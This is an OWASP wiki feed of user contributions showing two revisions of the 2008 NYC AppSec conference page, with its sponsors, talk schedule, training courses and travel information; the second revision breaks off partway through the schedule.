https://wiki.owasp.org/api.php?action=feedcontributions&feedformat=atom&user=TomRyanOWASP - User contributions [en]2026-04-23T13:11:11ZUser contributionsMediaWiki 1.27.2https://wiki.owasp.org/index.php?title=OWASP_NYC_AppSec_2008_Conference&diff=33786OWASP NYC AppSec 2008 Conference2008-07-09T19:24:39Z<p>TomRyan: /* 2008 OWASP USA, NYC Conference Schedule – Sept 24th - Sept 25th */</p>
<hr />
<div>= 2008 OWASP USA, NYC =<br />
Last Update: {{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}<br />
<br />
<center>[http://guest.cvent.com/i.aspx?4W,M3,828ca6d1-1b60-4105-8034-d344700e6956 http://www.owasp.org/images/6/61/Banner2_irfan.jpg]</center><br />
<br><br />
<hr><br />
<center>[http://www.owasp.org/images/6/66/NY_Sponsorship_Form_update_%282%29.pdf Diamond Sponsor] 1/1 - [http://www.imperva.com http://www.owasp.org/images/d/de/Imperva_2color_RGB.jpg]<br><br />
<br>[https://www.owasp.org/images/6/66/NY_Sponsorship_Form_update_%282%29.pdf Platinum Sponsor] 2/3 - [http://www.whitehatsec.com http://www.owasp.org/images/archive/4/4d/20080703021901%21Whitehat.gif] - [http://www.cenzic.com/ https://www.owasp.org/images/b/bf/CenzicLogo_RGB.gif] - [http://www.owasp.org/images/6/66/NY_Sponsorship_Form_update_%282%29.pdf http://www.owasp.org/images/f/f8/Sponsorsm.gif] </center><br><br />
[http://www.owasp.org/images/6/66/NY_Sponsorship_Form_update_%282%29.pdf Gold, Silver & Other Sponsors] - [http://www.isc2.org http://www.owasp.org/images/4/45/Isc2logo.gif] - [http://www.f5.com http://www.owasp.org/images/7/7e/50px-F5_50px.jpg] - [http://www.aspectsecurity.com http://www.owasp.org/images/d/d1/Aspect_logo.gif] - [http://www.foundstone.com/us/education-overview.asp http://www.owasp.org/images/2/26/Foundstone.jpg] - [http://www.proactiverisk.com https://www.owasp.org/images/9/97/Proactiverisk_logo.jpg] - [http://www.ouncelabs.com https://www.owasp.org/images/6/6e/OunceLabs_logo.jpg] - [http://www.fortify.com https://www.owasp.org/images/a/ac/Fortify.jpg] - [http://www.cigital.com/ https://www.owasp.org/images/b/be/Cigital_OWASP.GIF] - [http://www.accessitgroup.com https://www.owasp.org/images/6/6d/Accessit.JPG] - [http://evangelyze.net/marketing.asp https://www.owasp.org/images/1/10/Evlogo.jpg] - [http://www.arctecgroup.net http://www.owasp.org/images/b/bf/Arctec.jpg] - [http://www.airtightnetworks.net https://www.owasp.org/images/8/8b/Airtight.gif] - [http://www.securityuniversity.net/ https://www.owasp.org/images/0/0d/Security_university.jpg] - [http://www.owasp.org/images/6/66/NY_Sponsorship_Form_update_%282%29.pdf http://www.owasp.org/images/f/f8/Sponsorsm.gif]<br />
<br><br />
<center>[https://www.owasp.org/images/6/66/NY_Sponsorship_Form_update_%282%29.pdf Sponsorship Opportunities] -- [http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference-PRESS Press Registration] -- [http://www.owasp.org/index.php/Member_Offers Other OWASP Member Offers] </center> <br />
<hr><br />
In association with: [http://www.webappsec.org WASC], [http://www.nym-infragard.us NYM InfraGard], [http://aitglobal.com AITGlobal], [http://nyphp.org/index.php NYC PHP], [http://www.nycbug.org NYCBUG], [http://www.isacany.net ISACA], [http://www.issa.org ISSA] and [http://www.pace.edu Pace University] you're invited to (2) days of Seminars and Technology Pavilion from the world's best application security technology minds, (2) days of hardcore hands-on training, all held at <b>[http://www.pace.edu/page.cfm?doc_id=16157 Pace University]</b>, located in downtown New York City at <b>One Pace Plaza New York, NY 10038.</b> Event Fees: $350 Members / $400 Non-Members / $200 for Students for [http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference#OWASP_NYC_AppSec_2008_Training_Courses_-_September_22nd_and_23rd.2C_2008 2 days of hands on training classes] are also available.<br />
<center>[http://guest.cvent.com/i.aspx?4W,M3,828ca6d1-1b60-4105-8034-d344700e6956 http://www.owasp.org/images/7/7f/Register.gif]<br />
To Get more involved and discuss this upcoming event [http://owaspfoundation.ning.com click here for forums] or visit other OWASP [http://www.owasp.org/index.php/Member_Offers member offers]<br />
</center><br />
<br />
== 2008 OWASP USA, NYC Conference Schedule – Sept 24th - Sept 25th ==<br />
<center>[http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference/speakeragreement OWASP Speaker Agreement]</center><br />
{| style="width:80%" border="0" align="center"<br />
! colspan="4" align="center" style="background:#4058A0; color:white" | Day 1 – Sept 24th, 2008 <br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:30%; background:#BC857A" | Track 1: <br />
| style="width:30%; background:#BCA57A" | Track 2: <br />
| style="width:30%; background:#99FF99" | Track 3: <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-10:00 || colspan="3" style="width:80%; background:#C2C2C2" align="center" | '''Doors Open for Attendee/Speaker Registration & [http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference#Technology_Pavilion_-_September_24th_and_25th Exhibit/Sponsor Area]'''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:00-09:45 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | OWASP Version 3.0 who we are, where we are.. where we are going <br />
''[http://www.owasp.org/index.php/Contact OWASP Foundation]: Jeff Williams, Dinis Cruz, Dave Wichers, Tom Brennan, Sebastien Deleersnyder, Paolo Perego, Kate Hartmann & Alison Shrader <br />
'' <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:00-10:45 || style="width:30%; background:#BC857A" align="left" | [http://www.owasp.org/index.php/AppSecEU08_Trends_in_Web_Hacking_Incidents:_What%27s_hot_for_2008 Analysis of the Web Hacking Incidents Database (WHID)]<br />
''[http://blog.shezaf.com Ofer Shezaf]''<br />
| style="width:30%; background:#BCA57A" align="left" | [http://www.webappsecroadmap.com Web Application Security Road Map] <br><br />
''[http://joesecurity.blogspot.com Joe White]''<br />
| style="width:30%; background:#99FF99" align="left" |[https://buildsecurityin.us-cert.gov/swa/acqwg.html Enhancing the software acquisition process to address software assurance issues.]<br />
''Stan Wisseman''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:00-11:45 || style="width:30%; background:#BC857A" align="left" | Web Security Education using Open Source Tools<br />
''Prof. Li-Chiou Chen & Chienitng Lin, [http://www.pace.edu/page.cfm?doc_id=16399 Pace Univ]''<br />
| style="width:30%; background:#BCA57A" align="left" | Http Bot Research<br />
''[http://www.shadowserver.org/wiki/pmwiki.php?n=Shadowserver.Mission Andre M. DiMino - ShadowServer Foundation]''<br />
| style="width:30%; background:#99FF99" align="left" | MalSpam Research <br />
'' [http://www.knujon.com/bios.html Garth Bruen]''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | [http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference/ctf Capture the Flag] Sign-Up<br />
''LUNCH - Provided by event sponsors @ TechExpo''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-12:30 || style="width:30%; background:#BC857A" align="left" | e-Gateway<br />
''[http://www.linkedin.com/in/tommyryan Tom Ryan]''<br />
| style="width:30%; background:#BCA57A" align="left" | Framework-level Threat Analysis: Adding Science to the Art of Source-code review<br />
''Nishchal Bhalla''<br />
| style="width:30%; background:#99FF99" align="left" | Automated Web-based Malware Behavioral Analysis <br />
'' Tyler Hudak''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:45 || style="width:30%; background:#BC857A" align="left" | Offensive Assessing Financial Applications<br />
'' [http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference-daniel-cuthbert Daniel Cuthbert]''<br />
| style="width:30%; background:#BCA57A" align="left" | WAF ModSecurity<br />
''[http://www.thinkingstone.com/about/ivan-ristic.html Ivan Ristic]''<br />
| style="width:30%; background:#99FF99" align="left" | OWASP & NYC<br />
''[http://www.linkedin.com/in/davidstern2000 David Stern]''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:00-14:45 || style="width:30%; background:#BC857A" align="left" | Logic Attacks and Inefficiencies of Robotic Detection<br />
''[http://ha.ckers.org/blog/about Robert "RSnake" Hansen], CEO SecTheory''<br />
| style="width:30%; background:#BCA57A" align="left" | Reverse Engineering .NET <br />
''Adam Boulton''<br />
| style="width:30%; background:#99FF99" align="left" | JBroFuzz 0.1 - 1.1: Building a Java Fuzzer for the Web <br />
''[http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference-SPEAKER-Yiannis_Pavlosoglou Yiannis Pavlosoglou]''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:45 || style="width:30%; background:#BC857A" align="left" |Industry Panel w/ Jennifer Bayuk CISO Bear Stearns, Mark Clancy EVP CitiGroup, Jim Routh CISO DTCC, Sunil Seshadri CISO NYSE-Euronet, Warren Axelrod SVP Bank of America, Joe Bernik Royal Bank of Scotland & Philip Venables CIRO, Goldman, Sachs<br />
| style="width:30%; background:#BCA57A" align="left" | [http://www.owasp.org/index.php/Wild_Wild_Web_on_Security_Planet Wild Wild Web on Security Planet]<br />
''[http://www.expresscertifications.com/company/execmgt.aspx Mano Paul] CEO Express Certifications''<br />
| style="width:30%; background:#99FF99" align="left" |[http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference-SPEAKER-GunterOllmann Multidisciplinary Bank Attacks]<br />
''Gunter Ollmann''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:00-16:45 || style="width:30%; background:#BC857A" align="left" | OWASP Enterprise Security API [http://www.owasp.org/index.php/ESAPI (ESAPI) Project]<br />
'' [http://www.aspectsecurity.com/management.htm Jeff Williams] & Jim Manico''<br />
| style="width:30%; background:#BCA57A" align="left" | Shootout @ Blackbox Corral<br />
''Larry Suto ''<br />
| style="width:30%; background:#99FF99" align="left" | 80% 10% 10%<br />
'' [http://www.blogger.com/profile/07177656204885181542 Andy Steingruebl], Security @ PayPal''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:00-17:45 || style="width:30%; background:#BC857A" align="left" | Threading the Needle:<br />
<br />
Bypassing web application/service security controls using Encoding, Transcoding, Filter Evasion, and other Canonicalization Attacks<br />
'' [http://www.linkedin.com/in/arianevans Arian Evans]''<br />
| style="width:30%; background:#BCA57A" align="left" |Shhhh Don’t Tell Anybody <br />
''[http://www.linkedin.com/in/ppetkov Petko D. Petkov]''<br />
| style="width:30%; background:#99FF99" align="left" | [http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference-SPEAKER-Andres_Riancho W3AF Open Source App Scanner]<br />
''Andres Riancho''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 18:00-18:45 || style="width:30%; background:#BC857A" align="left" | [http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project OWASP Live CD]<br />
'' [http://www.linkedin.com/in/packetfocus Joshua Perrymon]''<br />
| style="width:30%; background:#BCA57A" align="left" | Coding Secure w/PHP<br />
''[http://www.linkedin.com/in/zaunere Hans Zaunere]''<br />
| style="width:30%; background:#99FF99" align="left" | [http://www.owasp.org/index.php/Payment_Card_Data_Security_and_the_new_Enterprise_Java Payment Card Data Security and the new Enterprise Java]<br />
''Dr. B. V. Kumar & Mr. Abhay Bhargav''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 20:00-23:00 || colspan="3" style="width:80%; background:#C2C2C2" align="center" | OWASP NYC AppSec 2008 VIP Party<br />
''Location: TBD''<br />
|-<br />
! colspan="10" align="center" style="background:#4058A0; color:white" | Day 2 – Sept 25th, 2008 <br />
|-<br />
| style="width:10%; background:#99FF99" | 08:00-10:00 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | BREAKFAST - Provided by event sponsors @ TechExpo<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:00-08:45 || style="width:30%; background:#BC857A" align="left" | State of the Union<br />
''[http://www.aeispeakers.com/speakerbio.php?SpeakerID=1192 Prof. Howard A. Schmidt, CISSP, CISM (Hon.)] Current (ISC)² Security Strategist and Former White House Cyber Security Advisor''<br />
| style="width:30%; background:#BCA57A" align="left" | Best Practices Guide: Web Application Firewalls<br />
''Dr. Georg Hess''<br />
| style="width:30%; background:#99FF99" align="left" | The Good The Bad and The Ugly - Pen Testing VS. Source Code Analysis<br />
''[http://www.linkedin.com/in/tommyryan Thomas Ryan]''<br />
<br />
<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:00-09:45 || style="width:30%; background:#BC857A" align="left" | Good vs. Evil JavaScript<br />
''[http://jeremiahgrossman.blogspot.com Jeremiah Grossman]''<br />
| style="width:30%; background:#BCA57A" align="left" | OWASP V2 Testing Guide 4.2.3 Spidering and Googling in depth <br />
''[http://www.linkedin.com/in/ChristianHeinrich Christian Heinrich]''<br />
| style="width:30%; background:#99FF99" align="left" | OWASP Web Services Top Ten<br />
''[http://1raindrop.typepad.com Gunnar Peterson]''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:00-10:45 || style="width:30%; background:#BC857A" align="left" | OWASP Update <br />
''Dinis Cruz/Jeff Williams + Surprise Guest''<br />
| style="width:30%; background:#BCA57A" align="left" | Help Wanted 7 Things You Need to Know APPSEC/INFOSEC Employment<br />
''[http://www.linkedin.com/pub/0/29/685 Lee Kushner]''<br />
| style="width:30%; background:#99FF99" align="left" | APPSEC Industry Analysts<br />
''Speaker TBD''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:00-11:45 || style="width:30%; background:#BC857A" align="left" | [http://www.owasp.org/index.php/Category:OWASP_CLASP_Project CLASP (Comprehensive, Lightweight Application Security Process)]<br />
''Pravir Chandra''<br />
| style="width:30%; background:#BCA57A" align="left" | Next Generation Cross Site Scripting Worms <br />
''[http://i8jesus.com/?page_id=5 Arshan Dabirsiaghi]''<br />
| style="width:30%; background:#99FF99" align="left" | Secure Software Impact<br />
''[http://ouncelabs.com/company/team.asp Jack Danahy]''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-12:45 || style="width:30%; background:#BC857A" align="left" | Security in Agile Development<br />
''[http://www.owasp.org/index.php/User:Wichers Dave Wichers]''<br />
| style="width:30%; background:#BCA57A" align="left" | Security of Software-as-a-Service (SaaS)<br />
''[http://www.linkedin.com/pub/6/372/45a James Landis]''<br />
| style="width:30%; background:#99FF99" align="left" | [http://reversebenchmarking.com/About.html Open Reverse Benchmarking Project]<br />
''Marce Luck & [http://www.linkedin.com/pub/1/507/616 Tom Stracener]''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | [http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference/ctf Capture the Flag] Status<br />
''LUNCH - Provided @ TechExpo''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:45 || style="width:30%; background:#BC857A" align="left" | Security Research Report<br />
''[http://www.linkedin.com/pub/5/742/233 Dinis Cruz]''<br />
| style="width:30%; background:#BCA57A" align="left" | [http://www.owasp.org/index.php/Category:OWASP_Pantera_Web_Assessment_Studio_Project Pantera Advances]<br />
''[http://www.linkedin.com/pub/1/598/855 Simon Roses Femerling]''<br />
| style="width:30%; background:#99FF99" align="left" | Lotus Notes Insecurity <br />
''Jian Hui Wang''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:00-14:45 || style="width:30%; background:#BC857A" align="left" | Practical Advanced Threat Modeling<br />
''John Steven''<br />
| style="width:30%; background:#BCA57A" align="left" | [http://www.owasp.org/index.php/Category:OWASP_Orizon_Project Owasp Orizon]<br />
''Paolo Perego''<br />
| style="width:30%; background:#99FF99" align="left" | Building Usable Security<br />
''Zed Abbadi''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:45 || style="width:30%; background:#BC857A" align="left" | [http://www.owasp.org/index.php/Input_validation:_the_Good%2C_the_Bad_and_the_Ugly Input validation: the Good, the Bad and the Ugly]<br />
''Johan Peeters''<br />
| style="width:30%; background:#BCA57A" align="left" | Off-shoring Application Development? Security is Still Your Problem<br />
''Rohyt Belani''<br />
| style="width:30%; background:#99FF99" align="left" | NIST SAMATE Static Analysis Tool Exposition (SATE)<br />
''Vadim Okun''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:00-16:45 || style="width:30%; background:#BC857A" align="left" | Vulnerabilities in application interpreters and runtimes<br />
''Erik Cabetas''<br />
| style="width:30%; background:#BCA57A" align="left" | Flash Parameter Injection (FPI)<br />
''Ayal Yogev & Adi Sharabani''<br />
| style="width:30%; background:#99FF99" align="left" | Cross-Site Scripting Filter Evasion<br />
''Alexios Fakos''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:00-17:45 || colspan="3" style="width:80%; background:#C2C2C2" align="center" | '''Wizdom of Crowds / CTF Awards & Raffles'''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 18:30-19:30 || colspan="3" style="width:80%; background:#C2C2C2" align="center" | OWASP Foundation, Chapter Leader Meeting<br />
|}<br />
<br />
<br />
<center>[http://guest.cvent.com/i.aspx?4W,M3,828ca6d1-1b60-4105-8034-d344700e6956 http://www.owasp.org/images/7/7f/Register.gif]</center><br />
<br />
== Technology Pavilion - September 24th and 25th ==<br />
<br />
Want to see the latest offerings from technology product and service firms, visit the Technology Pavilion. On September 24th and 25th. 2 full days of exhibits by service providers and manufacturers from around the world.<br />
<br />
Do you want to preview the event space [http://www.flickr.com/photos/21550725@N04/sets/72157604662279903/detail Click Here]<br />
<br />
<hr><br />
<br />
== [http://www.owasp.org/index.php/Category:OWASP_AppSec_Conference_Training OWASP NYC AppSec 2008 Training Courses - September 22nd and 23rd, 2008] ==<br />
{| style="width:80%" border="0" align="center"<br />
! align="center" style="background:#4058A0; color:white" | T1. Defensive Programming - 2-Days - $1350<br />
|-<br />
| style="background:#F2F2F2" | This class will teach you how to program defensively. A must for developers, managers, testers and security professionals. Learn the latest techniques to build attack resistant code, protect from current and future vulnerabilities and how to secure an application from both implementation bugs and design flaws. The instructor Pravir Chandra is well known security expert, project lead for OWASP CLASP project and former co-founder & CTO of secure software [[:Category:OWASP_AppSec_Conference_Training | Learn More Here]]<br />
<br />
Instructor: Jason Rouse, Sr. Consultant, [http://www.cigital.com/training/series http://www.owasp.org/images/b/be/Cigital_OWASP.GIF]''' <br />
|-<br />
{| style="width:80%" border="0" align="center"<br />
! align="center" style="background:#4058A0; color:white" | T2. Secure Coding for Java EE - 2-Days - $1350<br />
|-<br />
| style="background:#F2F2F2" | This course is similar to Aspect's Building and Testing Secure Web Applications except it includes a significant amount of Java focused content, including:<br />
# Java EE security overview,<br />
# All coding examples and recommendations are specifically focused on Java and Java servers, and<br />
# 3 additional hands on coding labs where the students find and then fix security vulnerabilities in a Java EE application developed for the class.<br />
<br />
[[:Category:OWASP_AppSec_Conference_Training | Learn More Here]]<br />
<br />
Instructor: This tutorial is provided by longtime OWASP contributor: [http://www.aspectsecurity.com http://www.owasp.org/images/d/d1/Aspect_logo.gif]<br />
'''<br />
|-<br />
! align="center" style="background:#4058A0; color:white" | T3. Web Services and XML Security - 2-Days - $1350<br />
|-<br />
| style="background:#F2F2F2" | The movement towards Web Services and Service Oriented architecture (SOA) paradigms requires new security paradigms to deal with new risks posed by these architectures. This session takes a pragmatic approach towards identifying Web Services security risks and selecting and applying countermeasures to the application, code, web servers, databases, application, and identity servers and related software. [[:Category:OWASP_AppSec_Conference_Training | Learn More Here]]<br />
<br />
Instructor: Gunnar Peterson''' [http://www.arctecgroup.net https://www.owasp.org/images/b/bf/Arctec.jpg]<br />
|-<br />
! align="center" style="background:#4058A0; color:white" | T4. Advanced Web Application Security Testing - 2-Days - $1350<br />
|-<br />
| style="background:#F2F2F2" | Course Overview While all developers need to know the basics of web application security testing, application security specialists will want to know all the advanced techniques for finding and diagnosing security problems in applications. Aspect’s Advanced Web Application Security Testing training is based on a decade of work verifying the security of critical applications. The course is taught by an experienced application security practitioner in an interactive manner. [[:Category:OWASP_AppSec_Conference_Training | Learn More Here]]<br />
<br />
Instructor: This tutorial is provided by longtime OWASP contributor: [http://www.aspectsecurity.com http://www.owasp.org/images/d/d1/Aspect_logo.gif]'''<br />
|-<br />
! align="center" style="background:#4058A0; color:white" | T5. Leading the Development of Secure Applications 1-Day - Sept 22nd- $675<br />
|-<br />
| style="background:#F2F2F2" | In this one-day management session you’ll get the answers to the ten key questions that most CIOs and development managers face when trying to improve security in the development process. The course provides proven techniques and valuable lessons learned that can be applied to projects at any phase of their application’s lifecycle. [[:Category:OWASP_AppSec_Conference_Training | Learn More Here]]<br />
Instructor: This tutorial is provided by longtime OWASP contributor: [http://www.aspectsecurity.com http://www.owasp.org/images/d/d1/Aspect_logo.gif]'''<br />
|-<br />
! align="center" style="background:#4058A0; color:white" | T7. Encryption Programming Using SKSML - 2-Days - $1350<br />
|-<br />
| style="background:#F2F2F2" | Application developers are increasingly required to protect sensitive data through encryption. While there are many libraries that can assist with cryptography, there are few to none that focus on encryption key management.<br />
<br />
This class will introduce you to an OASIS standards protocol - Symmetric Key Services Markup Language (SKSML) - and show you how it can be used to securely encrypt sensitive data and manage encryption keys across the enterprise. [[:Category:OWASP_AppSec_Conference_Training | Learn More Here]]<br />
<br />
Instructor: Arshad Noor, CTO, StrongAuth Inc.''' [http://www.strongauth.com https://www.owasp.org/images/8/86/StrongAuth.jpg]<br />
|-<br />
{| style="width:80%" border="0" align="center"<br />
! align="center" style="background:#4058A0; color:white" | T8. Writing Secure Code ASP.NET - 2-Days - $1350<br />
|-<br />
| style="background:#F2F2F2" | Understand the key security features of the .NET platform, the common web security pitfalls developers make, and how to build secure and reliable web applications using ASP.NET. Students are lead through hands on code examples that highlight issues and prescribe solutions. [[:Category:OWASP_AppSec_Conference_Training | Learn More Here]]<br />
<br />
The instructors are Foundstone's Technical Director, Rudolph Araujo and Foundstone's Professional Services Conlultant, Alex Smolen. [http://www.foundstone.com/us/education-overview.asp https://www.owasp.org/images/2/26/Foundstone.jpg]<br />
|}<br />
<center>[http://guest.cvent.com/i.aspx?4W,M3,828ca6d1-1b60-4105-8034-d344700e6956 https://www.owasp.org/images/7/7f/Register.gif]</center><br />
<br />
<h2> HOTELS / TRAVEL </h2><br />
[http://maps.google.com/maps?near=Pace+Plz,+New+York,+NY+10038+(Pace+University+New+York+Cmps)&geocode=15467452012610799558,40.711640,-74.005820&q=hotel&f=l&dq=Pace+University-New+York&ie=UTF8&z=15&om=0 Hotels in the area of the event]<br />
<br />
New York City MTA: http://www.mta.nyc.ny.us/nyct/index.html<br />
<br />
New York City Subway & walking directions: http://www.hopstop.com/?city=newyork<br />
<br />
New York Sights & Sounds - SightsSounds<br />
<br />
New York City Travel Guide - http://www.nytoday.com/<br />
<br />
New York City Attractions - http://www.nycvisit.com<br />
<br />
New York TV Show Tickets - Get free tickets to TV shows! - http://www.nytix.com/<br />
<br />
New York City local news: http://www.ny1news.com<br />
<br />
<h2>EVENT SPONSORSHIP </h2>The OWASP Conferences & Training security technologists including CSOs,admins, application admins, MIS directors, homeland defense chiefs. These important influencers drive buying decisions exclusive access to its audiences. OWASP has established strategic relationships with security—print publications, newsletters, portals, consultants,message—and leadership positioning OWASP events. OWASP’s mission is supported by organizations who share our application, and software security communities. This approach should be part of your mix.<br />
<br />
<b>[https://www.owasp.org/images/6/66/NY_Sponsorship_Form_update_%282%29.pdf Sponsorship Opportunities]- Register online: [http://guest.cvent.com/i.aspx?4W,M3,09e3b490-ba93-4474-851e-be803b1a01c2 click here]</b></div>TomRyanhttps://wiki.owasp.org/index.php?title=OWASP_NYC_AppSec_2008_Conference&diff=33785OWASP NYC AppSec 2008 Conference2008-07-09T19:23:00Z<p>TomRyan: /* 2008 OWASP USA, NYC Conference Schedule – Sept 24th - Sept 25th */</p>
<hr />
<div>= 2008 OWASP USA, NYC =<br />
Last Update: {{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}<br />
<br />
<center>[http://guest.cvent.com/i.aspx?4W,M3,828ca6d1-1b60-4105-8034-d344700e6956 http://www.owasp.org/images/6/61/Banner2_irfan.jpg]</center><br />
<br><br />
<hr><br />
<center>[http://www.owasp.org/images/6/66/NY_Sponsorship_Form_update_%282%29.pdf Diamond Sponsor] 1/1 - [http://www.imperva.com http://www.owasp.org/images/d/de/Imperva_2color_RGB.jpg]<br><br />
<br>[https://www.owasp.org/images/6/66/NY_Sponsorship_Form_update_%282%29.pdf Platinum Sponsor] 2/3 - [http://www.whitehatsec.com http://www.owasp.org/images/archive/4/4d/20080703021901%21Whitehat.gif] - [http://www.cenzic.com/ https://www.owasp.org/images/b/bf/CenzicLogo_RGB.gif] - [http://www.owasp.org/images/6/66/NY_Sponsorship_Form_update_%282%29.pdf http://www.owasp.org/images/f/f8/Sponsorsm.gif] </center><br><br />
[http://www.owasp.org/images/6/66/NY_Sponsorship_Form_update_%282%29.pdf Gold, Silver & Other Sponsors] - [http://www.isc2.org http://www.owasp.org/images/4/45/Isc2logo.gif] - [http://www.f5.com http://www.owasp.org/images/7/7e/50px-F5_50px.jpg] - [http://www.aspectsecurity.com http://www.owasp.org/images/d/d1/Aspect_logo.gif] - [http://www.foundstone.com/us/education-overview.asp http://www.owasp.org/images/2/26/Foundstone.jpg] - [http://www.proactiverisk.com https://www.owasp.org/images/9/97/Proactiverisk_logo.jpg] - [http://www.ouncelabs.com https://www.owasp.org/images/6/6e/OunceLabs_logo.jpg] - [http://www.fortify.com https://www.owasp.org/images/a/ac/Fortify.jpg] - [http://www.cigital.com/ https://www.owasp.org/images/b/be/Cigital_OWASP.GIF] - [http://www.accessitgroup.com https://www.owasp.org/images/6/6d/Accessit.JPG] - [http://evangelyze.net/marketing.asp https://www.owasp.org/images/1/10/Evlogo.jpg] - [http://www.arctecgroup.net http://www.owasp.org/images/b/bf/Arctec.jpg] - [http://www.airtightnetworks.net https://www.owasp.org/images/8/8b/Airtight.gif] - [http://www.securityuniversity.net/ https://www.owasp.org/images/0/0d/Security_university.jpg] - [http://www.owasp.org/images/6/66/NY_Sponsorship_Form_update_%282%29.pdf http://www.owasp.org/images/f/f8/Sponsorsm.gif]<br />
<br><br />
<center>[https://www.owasp.org/images/6/66/NY_Sponsorship_Form_update_%282%29.pdf Sponsorship Opportunities] -- [http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference-PRESS Press Registration] -- [http://www.owasp.org/index.php/Member_Offers Other OWASP Member Offers] </center> <br />
<hr><br />
In association with: [http://www.webappsec.org WASC], [http://www.nym-infragard.us NYM InfraGard], [http://aitglobal.com AITGlobal], [http://nyphp.org/index.php NYC PHP], [http://www.nycbug.org NYCBUG], [http://www.isacany.net ISACA], [http://www.issa.org ISSA] and [http://www.pace.edu Pace University] you're invited to (2) days of Seminars and Technology Pavilion from the world's best application security technology minds, (2) days of hardcore hands-on training, all held at <b>[http://www.pace.edu/page.cfm?doc_id=16157 Pace University]</b>, located in downtown New York City at <b>One Pace Plaza New York, NY 10038.</b> Event Fees: $350 Members / $400 Non-Members / $200 for Students for [http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference#OWASP_NYC_AppSec_2008_Training_Courses_-_September_22nd_and_23rd.2C_2008 2 days of hands on training classes] are also available.<br />
<center>[http://guest.cvent.com/i.aspx?4W,M3,828ca6d1-1b60-4105-8034-d344700e6956 http://www.owasp.org/images/7/7f/Register.gif]<br />
To Get more involved and discuss this upcoming event [http://owaspfoundation.ning.com click here for forums] or visit other OWASP [http://www.owasp.org/index.php/Member_Offers member offers]<br />
</center><br />
<br />
== 2008 OWASP USA, NYC Conference Schedule – Sept 24th - Sept 25th ==<br />
<center>[http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference/speakeragreement OWASP Speaker Agreement]</center><br />
{| style="width:80%" border="0" align="center"<br />
! colspan="4" align="center" style="background:#4058A0; color:white" | Day 1 – Sept 24th, 2008 <br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:30%; background:#BC857A" | Track 1: <br />
| style="width:30%; background:#BCA57A" | Track 2: <br />
| style="width:30%; background:#99FF99" | Track 3: <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-10:00 || colspan="3" style="width:80%; background:#C2C2C2" align="center" | '''Doors Open for Attendee/Speaker Registration & [http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference#Technology_Pavilion_-_September_24th_and_25th Exhibit/Sponsor Area]'''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:00-09:45 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | OWASP Version 3.0 who we are, where we are.. where we are going <br />
''[http://www.owasp.org/index.php/Contact OWASP Foundation]: Jeff Williams, Dinis Cruz, Dave Wichers, Tom Brennan, Sebastien Deleersnyder, Paolo Perego, Kate Hartmann & Alison Shrader <br />
'' <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:00-10:45 || style="width:30%; background:#BC857A" align="left" | [http://www.owasp.org/index.php/AppSecEU08_Trends_in_Web_Hacking_Incidents:_What%27s_hot_for_2008 Analysis of the Web Hacking Incidents Database (WHID)]<br />
''[http://blog.shezaf.com Ofer Shezaf]''<br />
| style="width:30%; background:#BCA57A" align="left" | [http://www.webappsecroadmap.com Web Application Security Road Map] <br><br />
''[http://joesecurity.blogspot.com Joe White]''<br />
| style="width:30%; background:#99FF99" align="left" |[https://buildsecurityin.us-cert.gov/swa/acqwg.html Enhancing the software acquisition process to address software assurance issues.]<br />
''Stan Wisseman''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:00-11:45 || style="width:30%; background:#BC857A" align="left" | Web Security Education using Open Source Tools<br />
